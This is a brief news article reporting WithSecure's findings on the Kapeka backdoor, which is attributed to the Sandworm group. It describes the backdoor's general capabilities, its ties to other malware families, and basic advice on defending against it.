Kapeka: the new cyber threat from Russia
Discovering and analyzing a new global cybersecurity challenge
The Kapeka backdoor, identified by WithSecure, is a threat to Windows, linked to the Sandworm group. It disguises itself as a Word add-in and handles malicious operations remotely.
Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, also known as KnuckleTouch by Microsoft, has a significant impact on Windows operating systems. This cyber threat, linked to the Russian-affiliated Sandworm APT group, operates mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is characterized by its versatility, being capable of acting both as an initial tool for cyber-attacks and as persistent remote access to victims' assets.
Technical details and use of Kapeka in cyber attacks
The Kapeka backdoor is implemented as a Windows DLL written in C++, featuring advanced command and control (C2) functionality. This malicious module disguises itself as an add-in for Microsoft Word to avoid detection, executing multi-threaded operations to effectively handle commands received from the C2 server. Its capabilities include reading and writing files, executing shell commands, and self-management through updates or autonomous uninstallation, thus increasing its stealth and efficiency in cyber espionage attacks or ransomware distribution.
Relationships between Kapeka and other malware families
WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, indicating a possible evolution within Sandworm's strategy. Furthermore, a similarity in attack techniques was observed linking Kapeka to recent ransomware campaigns, such as that of Prestige. These associations suggest that Sandworm's arsenal is continually evolving, refining existing tools or developing new ones to increase the effectiveness of attacks.
Tips for protecting against the Kapeka threat
Microsoft has detected the use of "living-off-the-land" techniques, such as using the certutil utility to recover the dropper from compromised websites, emphasizing the importance of a proactive strategy in cybersecurity. It is essential to keep systems updated and conduct regular checks on codes and configurations. Promoting security awareness within organizations is crucial to mitigating the risk of infection from malware like Kapeka and protecting sensitive data and critical infrastructure.
Follow us on Facebook for more pills like this04/23/2024 18:26
Marco Verro